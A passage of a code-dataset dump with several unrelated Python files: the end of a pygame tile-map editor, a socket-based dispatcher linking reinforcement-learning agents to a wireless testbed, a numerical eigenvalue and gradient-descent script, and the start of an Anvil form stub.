rectY1 = mapRow*self.tileTypes[mapEntryKey].tileHeight\n rectX1 = mapCol*self.tileTypes[mapEntryKey].tileWidth\n rectY2 = rectY1 + self.tileTypes[mapEntryKey].tileHeight\n rectX2 = rectX1 + self.tileTypes[mapEntryKey].tileWidth\n \n if collideCircleRectangle(testCircleX,testCircleY,testCircleR,rectX1,rectY1,rectX2,rectY2):\n tileCenterX=(rectX1+rectX2)/2\n tileCenterY=(rectY1+rectY2)/2\n tileDistance=distance(testCircleX,testCircleY,tileCenterX,tileCenterY)\n collisionSet.append(CollisionTile(mapEntryKey,mapCol,mapRow,tileCenterX,tileCenterY,tileDistance))\n return collisionSet\n\nclass CollisionTile(object):\n def __init__(self,mapEntryKey,mapCol,mapRow,mapTileCenterX,mapTileCenterY,collideDistance):\n self.mapEntryKey=mapEntryKey\n self.mapCol=mapCol\n self.mapRow=mapRow\n self.mapTileCenterX=mapTileCenterX\n self.mapTileCenterY=mapTileCenterY\n self.collideDistance=collideDistance\n\ndef distance(x1,y1,x2,y2):\n return ((x2-x1)**2+(y2-y1)**2)**0.5\n \ndef nextDictKey(dictionary,key):\n keyList = sorted(dictionary.keys())\n currentIndex=keyList.index(key)\n newIndex=currentIndex+1\n if newIndex>len(keyList)-1:\n newIndex=0\n \n return keyList[newIndex]\ndef prevDictKey(dictionary,key):\n keyList = sorted(dictionary.keys())\n currentIndex=keyList.index(key)\n newIndex=currentIndex-1\n if newIndex<0:\n newIndex=len(keyList)-1\n return keyList[newIndex]\n\nif __name__ == \"__main__\":\n\n current_map = \"level 1.txt\"\n pygame.init()\n\n screen = pygame.display.set_mode((864, 576), pygame.SWSURFACE, 32)\n\n map1 = TileMap()\n map1.loadMap(current_map)\n\n map1.addTileType(\"grass_back\",TileType(\"sprite_sheet.png\",(0,0),tileCollides=False,isBack=False))\n map1.addTileType(\"grass.100\",TileType(\"sprite_sheet.png\",(0,0), isBack=False))\n map1.addTileType(\"grass.75\",TileType(\"sprite_sheet.png\",(0,1),tileCollides=False, isBack=False))\n map1.addTileType(\"grass.50\",TileType(\"sprite_sheet.png\",(0,2),tileCollides=False, isBack=False))\n map1.addTileType(\"grass.25\",TileType(\"sprite_sheet.png\",(0,3),tileCollides=False, isBack=False))\n\n map1.addTileType(\"dirt_back\",TileType(\"sprite_sheet.png\",(1,0),tileCollides=False,isBack=True))\n map1.addTileType(\"dirt.100\",TileType(\"sprite_sheet.png\",(1,0)))\n map1.addTileType(\"dirt.75\",TileType(\"sprite_sheet.png\",(1,1),tileCollides=False))\n map1.addTileType(\"dirt.50\",TileType(\"sprite_sheet.png\",(1,2),tileCollides=False))\n map1.addTileType(\"dirt.25\",TileType(\"sprite_sheet.png\",(1,3),tileCollides=False))\n\n map1.addTileType(\"stone_back\",TileType(\"sprite_sheet.png\",(0,4),tileCollides=False,isBack=True))\n map1.addTileType(\"stone.100\",TileType(\"sprite_sheet.png\",(0,4)))\n map1.addTileType(\"stone.75\",TileType(\"sprite_sheet.png\",(0,5),tileCollides=False ))\n map1.addTileType(\"stone.50\",TileType(\"sprite_sheet.png\",(0,6),tileCollides=False ))\n map1.addTileType(\"stone.25\",TileType(\"sprite_sheet.png\",(0,7),tileCollides=False ))\n\n map1.addTileType(\"gravel_back\",TileType(\"sprite_sheet.png\",(1,4),tileCollides=False,isBack=True))\n map1.addTileType(\"gravel.100\",TileType(\"sprite_sheet.png\",(1,4)))\n map1.addTileType(\"gravel.75\",TileType(\"sprite_sheet.png\",(1,5),tileCollides=False ))\n map1.addTileType(\"gravel.50\",TileType(\"sprite_sheet.png\",(1,6),tileCollides=False ))\n map1.addTileType(\"gravel.25\",TileType(\"sprite_sheet.png\",(1,7),tileCollides=False ))\n\n map1.addTileType(\"mossybrick_back\",TileType(\"sprite_sheet.png\",(0,8),tileCollides=False,isBack=True))\n map1.addTileType(\"mossybrick.100\",TileType(\"sprite_sheet.png\",(0,8)))\n map1.addTileType(\"mossybrick.75\",TileType(\"sprite_sheet.png\",(0,9),tileCollides=False ))\n map1.addTileType(\"mossybrick.50\",TileType(\"sprite_sheet.png\",(0,10),tileCollides=False ))\n map1.addTileType(\"mossybrick.25\",TileType(\"sprite_sheet.png\",(0,11),tileCollides=False ))\n\n map1.addTileType(\"crackedbrick_back\",TileType(\"sprite_sheet.png\",(1,8),tileCollides=False,isBack=True))\n map1.addTileType(\"crackedbrick.100\",TileType(\"sprite_sheet.png\",(1,8)))\n map1.addTileType(\"crackedbrick.75\",TileType(\"sprite_sheet.png\",(1,9),tileCollides=False ))\n map1.addTileType(\"crackedbrick.50\",TileType(\"sprite_sheet.png\",(1,10),tileCollides=False ))\n map1.addTileType(\"crackedbrick.25\",TileType(\"sprite_sheet.png\",(1,11),tileCollides=False ))\n\n map1.addTileType(\"brick_back\",TileType(\"sprite_sheet.png\",(2,8),tileCollides=False,isBack=True))\n map1.addTileType(\"brick.100\",TileType(\"sprite_sheet.png\",(2,8)))\n map1.addTileType(\"brick.75\",TileType(\"sprite_sheet.png\",(2,9),tileCollides=False ))\n map1.addTileType(\"brick.50\",TileType(\"sprite_sheet.png\",(2,10),tileCollides=False ))\n map1.addTileType(\"brick.25\",TileType(\"sprite_sheet.png\",(2,11),tileCollides=False ))\n\n map1.addTileType(\"netherbrick_back\",TileType(\"sprite_sheet.png\",(3,8),tileCollides=False,isBack=True))\n map1.addTileType(\"netherbrick.100\",TileType(\"sprite_sheet.png\",(3,8)))\n map1.addTileType(\"netherbrick.75\",TileType(\"sprite_sheet.png\",(3,9),tileCollides=False ))\n map1.addTileType(\"netherbrick.50\",TileType(\"sprite_sheet.png\",(3,10),tileCollides=False ))\n map1.addTileType(\"netherbrick.25\",TileType(\"sprite_sheet.png\",(3,11),tileCollides=False ))\n\n map1.addTileType(\"netherack_back\",TileType(\"sprite_sheet.png\",(0,12),tileCollides=False,isBack=True))\n map1.addTileType(\"netherack.100\",TileType(\"sprite_sheet.png\",(0,12)))\n map1.addTileType(\"netherack.75\",TileType(\"sprite_sheet.png\",(0,13),tileCollides=False ))\n map1.addTileType(\"netherack.50\",TileType(\"sprite_sheet.png\",(0,14),tileCollides=False ))\n map1.addTileType(\"netherack.25\",TileType(\"sprite_sheet.png\",(0,15),tileCollides=False ))\n\n map1.addTileType(\"soulsand.100\",TileType(\"sprite_sheet.png\",(1,12)))\n map1.addTileType(\"soulsand.75\",TileType(\"sprite_sheet.png\",(1,13),tileCollides=False ))\n map1.addTileType(\"soulsand.50\",TileType(\"sprite_sheet.png\",(1,14),tileCollides=False ))\n map1.addTileType(\"soulsand.25\",TileType(\"sprite_sheet.png\",(1,15),tileCollides=False ))\n\n\n map1.addTileType(\"torch\",TileType(\"sprite_sheet.png\",(4,4),tileCollides=False,isBack=True))\n map1.addTileType(\"toadstool\",TileType(\"sprite_sheet.png\",(4,5),tileCollides=False,isBack=True))\n map1.addTileType(\"mushroom\",TileType(\"sprite_sheet.png\",(4,6),tileCollides=False,isBack=True))\n map1.addTileType(\"flowerRed\",TileType(\"sprite_sheet.png\",(4,7),tileCollides=False,isBack=True))\n map1.addTileType(\"shrooms\",TileType(\"sprite_sheet.png\",(4,8),tileCollides=False,isBack=True))\n map1.addTileType(\"metalbars\",TileType(\"sprite_sheet.png\",(4,9),tileCollides=False,isBack=True))\n map1.addTileType(\"web\",TileType(\"sprite_sheet.png\",(4,11),tileCollides=False,isBack=True))\n map1.addTileType(\"tall_grass\",TileType(\"sprite_sheet.png\",(4,12),tileCollides=False,isBack=True))\n map1.addTileType(\"flowerYellow\",TileType(\"sprite_sheet.png\",(4,13),tileCollides=False,isBack=True))\n map1.addTileType(\"glowstone\",TileType(\"sprite_sheet.png\",(4,14),tileCollides=False,isBack=True))\n map1.addTileType(\"bookshelf\",TileType(\"sprite_sheet.png\",(4,15),tileCollides=False,isBack=True))\n\n\n map1.addTileType(\"trapGrass\",TileType(\"sprite_sheet.png\",(0,0))) #game 0,0\n map1.addTileType(\"trapGrassTripped\",TileType(\"sprite_sheet.png\",(2,0),tileCollides=False))\n map1.addTileType(\"trapStone\",TileType(\"sprite_sheet.png\",(0,4))) #game 0,4\n map1.addTileType(\"trapStoneTripped\",TileType(\"sprite_sheet.png\",(2,1),tileCollides=False))\n map1.addTileType(\"trapStoneBrick\",TileType(\"sprite_sheet.png\",(2,8))) #game 3,8\n map1.addTileType(\"trapStoneBrickTripped\",TileType(\"sprite_sheet.png\",(2,2),tileCollides=False))\n map1.addTileType(\"trapNetherBrick\",TileType(\"sprite_sheet.png\",(3,8))) #game 3,8\n map1.addTileType(\"trapNetherBrickTripped\",TileType(\"sprite_sheet.png\",(2,3),tileCollides=False))\n map1.addTileType(\"trapNether\",TileType(\"sprite_sheet.png\",(0,12))) #game 0,12\n map1.addTileType(\"trapNetherTripped\",TileType(\"sprite_sheet.png\",(2,4),tileCollides=False))\n map1.addTileType(\"trapObsidian\",TileType(\"sprite_sheet.png\",(3,6))) #game 3,6\n map1.addTileType(\"trapObsidianTripped\",TileType(\"sprite_sheet.png\",(2,5),tileCollides=False))\n\n\n\n map1.addTileType(\"nodigMetal\",TileType(\"sprite_sheet.png\",(3,2)))\n map1.addTileType(\"nodigCoal\",TileType(\"sprite_sheet.png\",(3,3)))\n map1.addTileType(\"nodigGold\",TileType(\"sprite_sheet.png\",(3,4)))\n map1.addTileType(\"nodigDiamond\",TileType(\"sprite_sheet.png\",(3,5)))\n map1.addTileType(\"nodigObsidian\",TileType(\"sprite_sheet.png\",(3,6)))\n map1.addTileType(\"nodigBedrock\",TileType(\"sprite_sheet.png\",(3,7)))\n map1.addTileType(\"iron\",TileType(\"sprite_sheet.png\",(3,2),tileCollides=False,isBack=True))\n map1.addTileType(\"coal\",TileType(\"sprite_sheet.png\",(3,3),tileCollides=False,isBack=True))\n map1.addTileType(\"goldore\",TileType(\"sprite_sheet.png\",(3,4),tileCollides=False,isBack=True))\n map1.addTileType(\"diamond\",TileType(\"sprite_sheet.png\",(3,5),tileCollides=False,isBack=True))\n map1.addTileType(\"obsidian\",TileType(\"sprite_sheet.png\",(3,6),tileCollides=False,isBack=True))\n map1.addTileType(\"bedrock\",TileType(\"sprite_sheet.png\",(3,7),tileCollides=False,isBack=True))\n\n map1.addTileType(\"ladder\",TileType(\"sprite_sheet.png\",(3,1)))\n map1.addTileType(\"escapeLadder\",TileType(\"sprite_sheet.png\",(3,1)))\n\n map1.addTileType(\"water\",TileType(\"sprite_sheet.png\",(4,0)))\n map1.addTileType(\"lava.1\",TileType(\"sprite_sheet.png\",(5,12)))\n map1.addTileType(\"lava.2\",TileType(\"sprite_sheet.png\",(5,13)))\n map1.addTileType(\"lava.3\",TileType(\"sprite_sheet.png\",(5,14)))\n map1.addTileType(\"lava.4\",TileType(\"sprite_sheet.png\",(5,15)))\n\n map1.addTileType(\"beam\",TileType(\"sprite_sheet.png\",(3,0)))\n map1.addTileType(\"gold\",TileType(\"sprite_sheet.png\",(4,1),tileCollides=False))\n map1.addTileType(\"enemy spawn\",TileType(\"sprite_sheet.png\",(4,2),tileCollides=False,isVisible=False))\n map1.addTileType(\"player spawn\",TileType(\"sprite_sheet.png\",(4,3),tileCollides=False,isVisible=False))\n\n map1.addTileType(\"air\",TileType(\"sprite_sheet.png\", (0,0), tileCollides=False,isVisible=False))\n\n clock = pygame.time.Clock()\n\n curTileKey=\"grass.100\"\n\n while True:\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n if keysPressed[pygame.K_ESCAPE]:\n break\n if keysPressed[pygame.K_s] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n map1.saveMap(current_map)\n map1.saveTileTypes(\"maptiles.txt\")\n print(\"Saved\")\n while keysPressed[pygame.K_s] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n if keysPressed[pygame.K_l] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n map1.loadMap(current_map)\n map1.loadTileTypes(\"maptiles.txt\")\n print(\"Loaded\")\n while keysPressed[pygame.K_l] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n if keysPressed[pygame.K_LEFT]:\n curTileKey=prevDictKey(map1.tileTypes,curTileKey)\n print(\"Current Tile:\",curTileKey)\n while keysPressed[pygame.K_LEFT]:\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n if keysPressed[pygame.K_RIGHT]:\n curTileKey=nextDictKey(map1.tileTypes,curTileKey)\n print(\"Current Tile:\",curTileKey)\n while keysPressed[pygame.K_RIGHT]:\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n\n (mx,my)=pygame.mouse.get_pos()\n (lb,mb,rb)=pygame.mouse.get_pressed()\n mouseCol=int(mx/map1.tileWidth)\n mouseRow=int(my/map1.tileHeight)\n if lb==True:\n map1.setTileMapEntry(mouseCol,mouseRow,curTileKey)\n if rb==True:\n map1.setTileMapEntry(mouseCol,mouseRow,None)\n\n screen.fill((0,5,25)) #clear screen\n\n map1.renderMap(screen)\n\n newSurf = map1.tileTypes[curTileKey].tileSurf.copy()\n newSurf.set_alpha(150)\n screen.blit(newSurf,(mouseCol*map1.tileWidth,mouseRow*map1.tileHeight))\n pygame.draw.rect(screen,(0,0,255),(mouseCol*map1.tileWidth,mouseRow*map1.tileHeight,map1.tileWidth,map1.tileHeight),2)\n\n pygame.draw.circle(screen,(255,50,50),(mx,my),40,1)\n\n collideTiles=map1.getCollisionSetCircle(mx,my,40)\n\n #show tiles that we're colliding with by drawing a line to each\n if len(collideTiles)>0:\n closestTile=collideTiles[0]\n for collideTile in collideTiles:\n if collideTile.collideDistance < closestTile.collideDistance:\n closestTile=collideTile\n\n pygame.draw.line(screen,(0,255,0),(mx,my),(collideTile.mapTileCenterX,collideTile.mapTileCenterY))\n pygame.draw.line(screen,(255,0,255),(mx,my),(closestTile.mapTileCenterX,closestTile.mapTileCenterY),3)\n\n pygame.display.flip()\n\n clock.tick(60)\n\n pygame.display.quit()\n","repo_name":"DaltonFox/Gold-Runner","sub_path":"PaulsEditor.py","file_name":"PaulsEditor.py","file_ext":"py","file_size_in_byte":24684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25726648258","text":"import time\nimport socket\nimport select\nimport re\nimport threading\nimport io\nimport random\nimport pickle\nimport numpy as np\nimport gym_dimmer.envs.utils.glossai_utils as glossai_utils\nfrom gym_dimmer.envs.utils.TraceHandler import TraceHandler\nfrom gym_dimmer.envs.utils.TestbedHandler import TestbedHandler\n\n\nclass Dispatcher(threading.Thread):\n###############################################################################################################\n# Class functions \"\"\"\n###############################################################################################################\n def __init__(self,\n requested_testbed,\n use_traces = False,\n one_agent_per_node = False,\n use_randomized_order = False, # deprecated\n use_randomized_value_at_beginning_of_episode = False, # deprecated\n **kwargs):\n threading.Thread.__init__(self)\n # Dispatcher has been requested to shut down \n self.should_stop_main_loop = False\n # save inputs\n self.use_randomized_order = use_randomized_order\n self.use_randomized_value_at_beginning_of_episode = use_randomized_value_at_beginning_of_episode\n self.is_one_agent_per_node = one_agent_per_node\n self.use_traces = use_traces\n # testbed name, a string\n self.testbed_name = None\n # network representation, a TraceHandler or TestbedHandler\n self.network = None\n # Dispatcher has detected that the action is incorrect? i.e., the N value requested is not permitted\n self.incorrect_action = False\n # Counter to avoid desync\n self.desync_counter = 0\n # Dispatcher's interface for RL agents\n self.buffer_size = glossai_utils.DISPATCHER_BUFFER_SIZE\n self.dispatcher = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.dispatcher.settimeout(60.)\n self.dispatcher.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n self.dispatcher.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n\n # Catch possible exceptions when reading traces or trying to get testbed's config\n try:\n self.testbed_name = requested_testbed\n if use_traces:\n self.network = TraceHandler(requested_testbed)\n else:\n self.network = TestbedHandler(requested_testbed)\n self.network.start()\n except Exception as e:\n glossai_utils.log_error(e)\n \n # Successfully selected traces or correct testbed\n glossai_utils.log_success(\"Dispatcher: {} selected: {}\".format(\"traces\" if use_traces else \"testbed\",\n requested_testbed))\n\n # Dispatcher.py: Check that trace/testbed selection has been carried\n assert self.testbed_name is not None and self.network is not None\n\n # Dispatcher's global view of N parameters of all nodes in the network\n self.N_value_for_nodes = [0]*self.network.nb_nodes # Actual N used by the node\n\n # RL agents are represented as socket clients\n self.RL_agents = None\n if one_agent_per_node:\n # if we have one RL algorithm per node in the network\n self.RL_agents = [None] * self.network.nb_nodes\n # allows switchiong between nodes if execution is one at a time\n self.agent_requested_reset = [False]*self.network.nb_nodes\n # used tp retrieve agent in list\n self.current_RL_agent_relative_id_in_order = -1\n # used to allow suffled order\n self.RL_agents_serving_order = np.array(range(len(self.RL_agents)))\n\n try:\n self.dispatcher.setblocking(glossai_utils.SOCKET_TIMEOUT_IN_SEC)\n self.dispatcher.bind((glossai_utils.DISPATCHER_ADDRESS, glossai_utils.DISPATCHER_PORT))\n self.dispatcher.listen()\n self.dispatcher.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n self.dispatcher.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n glossai_utils.log_success(\"Dispatcher has started, available at {}:{}\".format(glossai_utils.DISPATCHER_ADDRESS, glossai_utils.DISPATCHER_PORT))\n except Exception as e:\n glossai_utils.log_error(\"Couldn't start the Dispatcher!\")\n glossai_utils.log_error(\"{}\".format(e))\n self.dispatcher.close()\n\n def stop(self):\n # Stop TestbedHandler\n self.network.stop()\n self.should_stop_main_loop = True\n\n\n###############################################################################################################\n# Helper functions\n###############################################################################################################\n\n \"\"\"Check the validity of N parameter\"\"\"\n def _verify_N_parameter(self, N):\n try:\n min_N = glossai_utils.MIN_INDIVIDUAL_N if self.is_one_agent_per_node else glossai_utils.MIN_COMMON_N \n if N < min_N:\n self.incorrect_action = True\n N = min_N\n elif N > glossai_utils.MAX_N:\n N = glossai_utils.MAX_N\n self.incorrect_action = True\n return N\n except Exception as e:\n print(e)\n self.should_stop_main_loop = True\n return glossai_utils.DEFAULT_N_COMMAND\n\n def _get_full_desynchronized_state(self, state):\n glossai_utils.log_error(\"DEPRECATED FUNCTION: _get_full_desynchronized_state\")\n for i in range(self.network.nb_nodes):\n state[i] = 1.\n state[self.network.nb_nodes+i] = -1.\n return state\n\n def _modify_state_to_include_desync(self, state):\n glossai_utils.log_error(\"DEPRECATED FUNCTION: _modify_state_to_include_desync\")\n for i in range(self.network.nb_nodes, 2*self.network.nb_nodes):\n if state[i] < 0.:\n state[i] = -1.\n state[i-self.network.nb_nodes] = 1.\n return state\n\n def _is_glossy_desynchronized(self, lowest_ratio_packet_received):\n #glossai_utils.log_error(\"DEPRECATED FUNCTION: _is_glossy_desynchronized\")\n if (lowest_ratio_packet_received < 0.5):\n glossai_utils.log_debug(\"Lowest received ratio: {}\".format(lowest_ratio_packet_received))\n return lowest_ratio_packet_received < 0.4\n\n def _check_possible_desync(self):\n #glossai_utils.log_warning(\"_check_possible_desync\")\n self.network.wait(glossai_utils.DESYNC_TEST_WAIT_IN_FLOODS)\n current_state, _, ratio_packets_received = self.network.read_state()\n ratio_packets_received = np.array(ratio_packets_received)\n return self._is_glossy_desynchronized(np.min(ratio_packets_received))\n\n \"\"\"Security to avoid Glossy desynchronization\"\"\"\n def _avoid_desync(self):\n if self._check_possible_desync():\n glossai_utils.log_warning(\"Reset Glossy and reboostrap!\")\n self.network.send_action([glossai_utils.DEFAULT_N_COMMAND]*self.network.nb_nodes)\n self.network.wait(glossai_utils.BOOTSTRAPPING_WAIT_IN_FLOODS) # allows bootstrapping and sync\n\n###############################################################################################################\n# RL agent Communication functions\n###############################################################################################################\n\n def _send_to_agent(self, agent, data):\n agent.send(pickle.dumps(data) + glossai_utils.DISPATCHER_COMMAND_SEPARATOR)\n\n def _accept_RL_agent_connection(self):\n try:\n (connection_socket, (client_address,client_port)) = self.dispatcher.accept()\n connection_socket.settimeout(glossai_utils.SOCKET_TIMEOUT_IN_SEC)\n connection_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n glossai_utils.log_success(\"New RL agent ({}:{}) connecting to the system\".format(client_address, client_port))\n return connection_socket\n except Exception as e:\n glossai_utils.log_error(\"Couldn't accept RL agent as client\")\n glossai_utils.log_error(\"{}\".format(e))\n return None\n\n def _get_RL_agent_absolute_ID(self):\n if self.is_one_agent_per_node:\n return self.RL_agents_serving_order[self.current_RL_agent_relative_id_in_order]\n else:\n return 0\n\n def _get_next_RL_agent(self):\n # Reset counter to detect agent timeout\n self.RL_agent_timeout_counter = 0\n if self.is_one_agent_per_node:\n # get next RL agent\n self.current_RL_agent_relative_id_in_order +=1\n if self.current_RL_agent_relative_id_in_order >= len(self.RL_agents_serving_order):\n self.current_RL_agent_relative_id_in_order = 0\n # We can treat agents from 0..nb or use a shuffled order\n if self.use_randomized_order:\n np.random.shuffle(self.RL_agents_serving_order)\n return self.RL_agents[self._get_RL_agent_absolute_ID()]\n else:\n # only one RL agent in system\n return self.RL_agents\n\n def _get_RL_agent_requests(self, agent):\n try:\n # if one agent per node and node has requested reset last time, force a reset request\n if self.is_one_agent_per_node:\n if self.agent_requested_reset[self._get_RL_agent_absolute_ID()]:\n self.agent_requested_reset[self._get_RL_agent_absolute_ID()] = False\n return [pickle.dumps({\"request\":glossai_utils.RESET_REQUEST})]\n # Read from socket\n return agent.recv(self.buffer_size).split(glossai_utils.DISPATCHER_COMMAND_SEPARATOR)\n except Exception as e:\n self.should_stop_main_loop = True\n glossai_utils.log_error(\"Could not receive request from agent {}: {}\".format(agent,e))\n\n\n def _is_RL_agent_timeout(self): \n return self.RL_agent_timeout_counter >= glossai_utils.MULTIAGENT_MAXIMUM_TIMEOUT_FOR_AGENT_REQUEST\n\n def _execute_beginning_of_episode_computation(self):\n # Use a random N command value at the beginning of the episode?\n if self.use_randomized_value_at_beginning_of_episode:\n commands_for_glossy = [glossai_utils.KEEP_N_COMMAND]*self.network.nb_nodes\n commands_for_glossy[self._get_RL_agent_absolute_ID()] = np.random.randint(low=0, high=5)\n self.network.send_action(commands_for_glossy)\n###############################################################################################################\n# Request & Behaviour functions\n###############################################################################################################\n\n \"\"\"Execute the logic when a STATE request is received\"\"\"\n def _execute_state_request(self, agent, agentID = 0, should_check_desync = True):\n self.network.wait(glossai_utils.STATE_ACQUISITION_WAIT_IN_FLOODS)\n self.incorrect_action = False # todo remove\n state, current_n, ratio_packets_received = self.network.read_state(self.incorrect_action)\n self.incorrect_action = False\n # Save the lowest reliability during this observation\n self.lowest_ratio_received_packets = np.min(ratio_packets_received)\n\n # check we're not desync\n should_reset = False\n if should_check_desync:\n if self._is_glossy_desynchronized(self.lowest_ratio_received_packets):\n # reliability is low, check for a longer period of time to see if we are really desynchronizing\n if self._check_possible_desync():\n self.desync_counter += 1\n state = self._modify_state_to_include_desync(state)\n # if we believe we are desync, reset node N parameter to default and force next agent\n if self.desync_counter > 1: # at least two iterations were almost in desync\n glossai_utils.log_warning(\"Node {} caused a desync, reset command to default value\".format(agentID))\n should_reset = True\n commands_for_glossy = [glossai_utils.KEEP_N_COMMAND]*self.network.nb_nodes\n commands_for_glossy[agentID] = glossai_utils.DEFAULT_N_COMMAND\n self.network.send_action(commands_for_glossy)\n state = self._get_full_desynchronized_state(state)\n self.desync_counter = 0\n\n # send state to agent\n response = {\"state\": state, \"should_reset\": should_reset, \"this_agent_N\": current_n[agentID]}\n self._send_to_agent(agent, response)\n\n \"\"\"Execute the logic when a RESET request is received\"\"\"\n def _execute_reset_request(self, agent, agentID = 0):\n # Agent-env request a new episode some time ago, we need to read the current state\n self.network.wait(glossai_utils.STATE_ACQUISITION_WAIT_IN_FLOODS)\n # if we are using traces, we need to select a new subset of traces for the next episode\n if self.use_traces:\n self.network.request_reset()\n\n state, current_n, _ = self.network.read_state()\n # In a one env, all nodes share the same n\n response = {\"state\": state, \"this_agent_N\": current_n[agentID]}\n self._send_to_agent(agent, response)\n return True\n\n \"\"\"Execute the logic when a ACTION request is received, single-env case\"\"\"\n def _execute_action_request(self, requested_n, agent, agentID=0):\n # todo is the action incorrect?\n if self.incorrect_action:\n self.incorrect_action = True\n verified_n = self._verify_N_parameter(requested_n)\n #print(\"Dispatcher\", requested_n, verified_n)\n if self.is_one_agent_per_node:\n commands_for_glossy = [glossai_utils.KEEP_N_COMMAND]*self.network.nb_nodes\n commands_for_glossy[self._get_RL_agent_absolute_ID()] = verified_n\n else:\n commands_for_glossy = [verified_n]*self.network.nb_nodes\n self.network.send_action(commands_for_glossy)\n\n def _execute_end_of_episode_computation(self):\n self._avoid_desync()\n\n def _execute_request(self, current_RL_agent, agentID, request, done_serving_this_RL_agent):\n if request[\"request\"] == glossai_utils.STATE_REQUEST:\n #print(\"state\")\n self._execute_state_request(current_RL_agent, agentID, should_check_desync = False)\n elif request[\"request\"] == glossai_utils.RESET_REQUEST:\n #print(\"reset\")\n done_serving_this_RL_agent |= self._execute_reset_request(current_RL_agent, agentID)\n elif request[\"request\"] == glossai_utils.ACTION_REQUEST:\n #print(\"action\")\n self._execute_action_request(request[\"value\"], current_RL_agent, agentID)\n else:\n glossai_utils.log_warning(\"Non recognized request: {}, ({})\".format(request[\"request\"],\n request))\n return done_serving_this_RL_agent\n\n\n###############################################################################################################\n# Main loop\n###############################################################################################################\n\n def run(self):\n # Wait for RL agents connection\n if self.is_one_agent_per_node:\n for i in range(0,self.network.nb_nodes):\n self.RL_agents[i] = self._accept_RL_agent_connection()\n glossai_utils.log_success(\"RL Agent mapped to node {}\".format(i))\n else:\n self.RL_agents = self._accept_RL_agent_connection()\n glossai_utils.log_info(\"Dispatcher: Starting service loop.\")\n\n # WHILE TRUE\n while not self.should_stop_main_loop:\n done_serving_this_RL_agent = False\n\n # get next RL agent to serve\n current_RL_agent = self._get_next_RL_agent()\n # Check if we need to update the N value of this node to a random value for learning\n self._execute_beginning_of_episode_computation()\n\n # Serve this RL agent until end of episode or if agent has timeout\n while not done_serving_this_RL_agent and not self._is_RL_agent_timeout() and not self.should_stop_main_loop:\n # Read all requests received by this RL agent\n #t0 = time.time()\n packed_requests_list = self._get_RL_agent_requests(current_RL_agent)\n if packed_requests_list:\n for packed_request in packed_requests_list:\n t1 = time.time()\n # Avoid empty elements or timeout agent\n if packed_request ==b'':\n self.RL_agent_timeout_counter +=1\n continue\n self.RL_agent_timeout_counter = 0\n # Unpack request\n request = pickle.loads(packed_request)\n # Switch request type\n done_serving_this_RL_agent |= self._execute_request(current_RL_agent,\n self._get_RL_agent_absolute_ID(),\n request,\n done_serving_this_RL_agent)\n # glossai_utils.log_debug(\"request {} executed in {} ns\".format(request[\"request\"], (time.time()-t1)*1000000))\n #glossai_utils.log_debug(\"All requests in {} ns\".format((time.time()-t0)*1000000))\n # Execute end of episode check - desync\n # TODO\n #self._execute_end_of_episode_computation()\n","repo_name":"ds-kiel/dimmer","sub_path":"gyms/dimmer/gym_dimmer/envs/utils/Dispatcher.py","file_name":"Dispatcher.py","file_ext":"py","file_size_in_byte":18020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32365786211","text":"import numpy\nmatriz=numpy.array([[1,2,-1],\n [1,0,1],\n [4,-4,5]])\ndef Propio(mat,c):\n new=numpy.array([0,0,0])\n new[c]=1\n oldl=1\n newl=9999\n while numpy.abs(oldl-newl)>1e-18:\n old=new\n oldl=newl\n new=mat@old\n newl=new[c]/old[c]\n new=new/numpy.linalg.norm(new)\n return newl,new\ndef ProductoTensorial(vector,bector):\n T=numpy.zeros([vector.shape[0],bector.shape[0]])\n for i in range(len(vector)):\n for j in range(len(bector)):\n T[i,j]=vector[i]*bector[j]\n return T\ndef Propios(mat):\n triz=mat.copy()\n valores=numpy.zeros(mat.shape[0])\n vetores=numpy.zeros(mat.shape)\n for i in range(len(mat)):\n l, v=Propio(triz,i)\n valores[i]=l\n vetores[i]=v\n triz=triz-l*ProductoTensorial(v,v)\n return valores,vetores\nval,vec=Propios(matriz)\nval=val[len(val)-1]\nmatriz=matriz-(numpy.eye(3)*val)\ndef norma(vector):\n return numpy.sum(vector**2)**(1/2)\ndef func(vector):\n return norma(matriz@vector)\ndef derivada(f,r,h):\n return (f(r+h)-f(r-h))/(2*(norma(h)))\ndef gradiente(f,r,h):\n grad = numpy.array([0.0, 0.0, 0.0])\n for i in range(len(grad)):\n delta=numpy.zeros(grad.shape)\n delta[i]=h\n grad[i]=derivada(f,r,delta)\n return grad\ndef descenso(f,r):\n grad=numpy.zeros((3))\n dist=0.5\n while dist>1e-16:\n last=grad\n grad=gradiente(f,r,0.00001)\n grad=grad/norma(grad)\n if numpy.sum(last*grad)<0:\n dist/=2\n r-=dist*grad\n return r/norma(r)\nvec=descenso(func,numpy.array([1.0,0.0,0.0]))\nprint(\"El valor de estado base es:\")\nprint(val)\nprint(\"Su vector propio asociado es:\")\nprint(vec)","repo_name":"JuanDavidAnzolaAldana/Metodos1_JuanAnzola_AngelicaLopez","sub_path":"taller3/Algebra 10.py","file_name":"Algebra 10.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74002808572","text":"from ._anvil_designer import Form1Template\nfrom anvil import *\nimport anvil.server\n\nclass Form1(Form1Template):\n def __init__(self, **properties):\n # Set Form properties and Data Bindings.\n self.init_components(**properties)\n\n # Any code you write here will run before the form opens.\n\n def primary_color_1_click(self, **event_args):\n 